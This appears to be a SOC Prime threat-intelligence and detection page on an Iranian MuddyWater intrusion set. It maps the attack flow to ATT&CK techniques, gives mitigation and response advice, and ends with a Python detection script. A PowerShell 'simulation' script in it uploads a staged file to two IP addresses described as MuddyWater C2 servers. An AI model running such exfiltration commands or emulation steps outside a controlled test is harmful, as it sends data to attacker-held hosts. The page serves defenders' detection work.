SOC Prime Bias: Critical

06 Apr 2026 16:42 UTC

MuddyWater Revealed: Inside an Iranian APT Operation

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Researchers identified a MuddyWater (Static Kitten) intrusion set that combined multiple custom C2 frameworks with opportunistic exploitation of several internet-exposed flaws and large-scale credential spraying. The operators chained reconnaissance, initial-access and data-theft tooling to compromise targets in the Middle East, Europe and the United States.

Investigation

Investigators seized exposed infrastructure on a VPS hosted in the Netherlands and extracted binaries for three purpose-built C2 servers: KeyC2, PersianC2 and ArenaC2. They also recovered supporting tooling, including PowerShell-based loaders and Node.js payloads used for staging and execution. The activity featured broad scanning for publicly disclosed CVEs followed by exploitation, and incorporated blockchain smart contracts as a mechanism to resolve or update C2 endpoints dynamically.

Mitigation

Prioritise remediation of the referenced CVEs and reduce the attack surface by hardening and limiting the exposure of publicly reachable services. Block or severely restrict unknown outbound UDP traffic on port 1269 and monitor for execution artifacts tied to the custom C2 binaries and their distinctive command patterns. Apply the principle of least privilege to VPN and administrative accounts on network devices, and increase detection coverage for anomalous PowerShell behaviour and encrypted outbound sessions to unknown IPs.

Response

If indicators are observed, isolate affected systems, preserve memory and disk artifacts, and immediately block the identified C2 domains/IPs. Perform forensic triage of the recovered loaders and Node.js scripts to scope execution and persistence. Patch all exploited vulnerabilities and rotate any credentials that may have been exposed through spraying or theft.

Attack Flow

  1. T1595.002 Active Scanning: Vulnerability Scanning. Tool: Nuclei (high-speed vulnerability scanner used for large-scale internet probing). Mass-scan public services for exploitable CVEs such as FortiOS CVE-2024-55591 and Ivanti CVE-2026-1281.
  2. T1590.002 Gather Victim Network Information: DNS. Tools: subfinder (fast passive subdomain discovery), Sudomy, OneForAll. Enumerate subdomains and DNS records for targets such as clearview.ai and jewishagency.org.
  3. T1595.003 Active Scanning: Wordlist Scanning. Tool: ffuf (fast web fuzzer for directory and file discovery). Brute-force web directories with a medium-size wordlist to discover hidden resources.
  4. T1596.005 Search Open Technical Databases: Scan Databases. Tool: Shodan CLI. Query Shodan for vulnerable Ivanti devices using service signatures and favicon hashes.
  5. T1110.003 Brute Force: Password Spraying. Tool: Python owa.py script. Spray common passwords against Outlook Web Access and SMTP services of Israeli, Jordanian and UAE organisations.
  6. T1110.001 Brute Force: Password Guessing. Tool: Patator (multi-protocol brute-forcing tool supporting SMTP, SSH, HTTP, etc.). Attempt SMTP logins with credential lists to obtain valid accounts.
  7. T1190 Exploit Public-Facing Application. Technique: novel SQL injection flaws in BaSalam and a Postgres development platform; crafted SQLi payloads used to obtain an initial foothold on web servers.
  8. T1210 Exploitation of Remote Services. Tool: Neo-reGeorg ASPX web shell (remote command execution and tunneling), uploaded to a compromised Exchange server for persistence and remote command execution.
  9. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys. Malware: obfuscated Node.js payload VfZUSQi6oerKau.js creates an HKCU\Software\Microsoft\Windows\CurrentVersion\Run key for persistence.
  10. T1505.003 Server Software Component: Web Shell. Component: Neo-reGeorg web shell variant nfud.aspx, enabling remote command execution on the compromised server.
  11. T1136.001 Create Account: Local Account. Modified FortiGate exploit scripts add a persistent local admin account "FortiSetup" with the super_admin profile.
  12. T1027 Obfuscated Files or Information. Node.js payloads are heavily obfuscated and AES-CBC encrypted before being written to disk.
  13. T1140 Deobfuscate/Decode Files or Information. Tool: PowerShell loader reset.ps1 decrypts the AES-CBC encrypted blobs at runtime and loads the payloads in memory.
  14. T1620 Reflective Code Loading. The PowerShell loader loads the decrypted Node.js components reflectively in memory.
  15. T1071.001 Application Layer Protocol: Web Protocols. C2: PersianC2, HTTP polling of JSON API endpoints to retrieve commands.
  16. T1095 Non-Application Layer Protocol. C2: KeyC2, a custom binary protocol over UDP port 1269 for beaconing and command execution.
  17. T1102.001 Web Service: Dead Drop Resolver. Query Ethereum smart contracts to resolve C2 server IP addresses dynamically.
  18. T1102.002 Web Service: Bidirectional Communication. C2: ArenaC2 (FastAPI/uvicorn), an HTTP POST interface encrypting traffic with AES-256-CBC.
  19. T1102.003 Web Service: One-Way Communication. Component: minimal Flask server (web.py) on port 10443 accepting file uploads as a dead drop for stolen data.
  20. T1572 Protocol Tunneling. Neo-reGeorg acting as a SOCKS proxy (resocks, revsocks) to tunnel into internal networks.
  21. T1090.002 Proxy: External Proxy. Listeners resocks and revsocks create external SOCKS proxies for lateral movement.
  22. T1573.001 Encrypted Channel: Symmetric Cryptography. ArenaC2 encrypts all C2 traffic with AES-256-CBC using a hard-coded key.
  23. T1568 Dynamic Resolution. Smart-contract calls (getString) on Ethereum return the active C2 IP list (e.g., 185.236.25.119).
  24. T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage. Tool: rclone (command-line program for syncing files to cloud storage); destinations Wasabi S3 and put.io; upload stolen files to cloud storage accounts.
  25. T1041 Exfiltration Over C2 Channel. KeyC2 and PersianC2 support file download commands to retrieve data from victims.
  26. T1048 Exfiltration Over Alternative Protocol.

Simulation Execution

Prerequisite: the initial Telemetry and Baseline test must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the identified TTPs and are intended to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Reconnaissance & Data Staging: The attacker enumerates local files (T1005) and writes a small payload (secret.txt) on the workstation.
    2. C2 Communication Setup: Using PowerShell (T1059.001), the attacker issues an HTTPS POST to the MuddyWater C2 server 194.11.246.101 on port 443, embedding the staged data.
    3. Alternative Channel (Non-Standard Port): To evade simple port-based rules, the attacker repeats the exfiltration over port 1338 using Invoke-WebRequest with the -Port option (PowerShell 7+).
    4. Optional Proxy Chaining: The request is routed through an external proxy (T1090.002), but the final destination IP remains the MuddyWater host, so firewall logs retain the dst_ip.
  • Regression Test Script:

    # MuddyWater Exfiltration Simulation - PowerShell
    # -----------------------------------------------
    # Step 1: Create dummy data (Join-Path avoids "$env:TEMPsecret.txt" being read as one variable name)
    $dataPath = Join-Path $env:TEMP 'secret.txt'
    "Sensitive Data $(Get-Date)" | Out-File -FilePath $dataPath -Encoding UTF8
    
    # Step 2: Define C2 endpoints
    $c2Ips = @('194.11.246.101','18.223.24.218')
    $c2Ports = @(443,1338)
    
    # Step 3: Upload over HTTPS (port 443)
    foreach ($ip in $c2Ips) {
        $uri = "https://$ip/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Step 4: Upload over custom port 1338 (requires PowerShell 7+)
    foreach ($ip in $c2Ips) {
        # ${ip} is needed: "$ip:1338" would be parsed as a drive-qualified variable
        $uri = "http://${ip}:1338/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Step 5: Clean up
    Remove-Item -Path $dataPath -Force
  • Cleanup Commands:

    # Tear down any remaining network connections (Windows)
    Get-NetTCPConnection -RemoteAddress 194.11.246.101,18.223.24.218 -ErrorAction SilentlyContinue |
        Where-Object { $_.State -eq 'Established' } |
        ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }
    
    # Delete temporary files (run again if needed)
    $tempFile = Join-Path $env:TEMP 'secret.txt'
    if (Test-Path $tempFile) { Remove-Item $tempFile -Force }
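Detection logic for the telemetry this regression test produces, covering the Mitigation guidance above as well: outbound UDP/1269, known C2 addresses on ports 443 and 1338, and PowerShell opening encrypted sessions to unknown external IPs. This is an added example, not SOC Prime's rule content; the flow-log field layout, the RFC1918-only notion of "internal", and the sample log lines are assumptions constructed for it.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Watchlist of addresses named on this page (constructed for the example, not a live feed).
MUDDYWATER_C2 = {"194.11.246.101", "18.223.24.218", "185.236.25.119"}
KEYC2_UDP_PORT = 1269      # KeyC2 beacon port called out in Mitigation
EXFIL_PORTS = {443, 1338}  # ports exercised by the regression test
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed flow-log layout: "<ts> proto=<tcp|udp> src=<ip> dst=<ip> dport=<n> [process=<name>]"
LOG_RE = re.compile(r"^(?P<ts>\S+) proto=(?P<proto>tcp|udp) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
                    r"dport=(?P<dport>\d+)(?: process=(?P<proc>\S+))?$")

@dataclass
class Alert:
    rule: str
    dst: str

def evaluate(line: str) -> Optional[Alert]:
    m = LOG_RE.match(line)
    if not m:
        return None
    proto, dst, dport, proc = m["proto"], m["dst"], int(m["dport"]), m["proc"]
    # Rule 1: any outbound UDP/1269 is flagged regardless of destination (KeyC2 channel).
    if proto == "udp" and dport == KEYC2_UDP_PORT:
        return Alert("keyc2_udp_1269", dst)
    # Rule 2: known C2 address on the ports the test uses. Keying on dst rather than on the
    # port alone is what still fires for the test's port-1338 and external-proxy variants.
    if proto == "tcp" and dst in MUDDYWATER_C2 and dport in EXFIL_PORTS:
        return Alert("muddywater_c2_egress", dst)
    # Rule 3: PowerShell opening an encrypted session to a non-RFC1918 address not on the list.
    external = not any(ipaddress.ip_address(dst) in net for net in INTERNAL_NETS)
    if proc and proc.lower() == "powershell.exe" and dport == 443 and external:
        return Alert("powershell_unknown_tls_egress", dst)
    return None

def run(lines) -> List[Alert]:
    return [a for a in map(evaluate, lines) if a is not None]

# Constructed sample telemetry for the regression test above; not captured data.
SAMPLE_LOGS = [
    "2026-04-06T16:42:00Z proto=tcp src=10.0.0.5 dst=194.11.246.101 dport=443 process=powershell.exe",
    "2026-04-06T16:42:01Z proto=tcp src=10.0.0.5 dst=18.223.24.218 dport=1338 process=powershell.exe",
    "2026-04-06T16:42:02Z proto=udp src=10.0.0.7 dst=203.0.113.9 dport=1269",
    "2026-04-06T16:42:03Z proto=tcp src=10.0.0.5 dst=10.0.0.20 dport=445 process=explorer.exe",
    "2026-04-06T16:42:04Z proto=tcp src=10.0.0.5 dst=198.51.100.4 dport=443 process=powershell.exe",
]
```

Running `run(SAMPLE_LOGS)` yields four alerts: the two C2 uploads, the UDP/1269 beacon, and the PowerShell session to an unlisted external address, while the internal SMB flow is ignored.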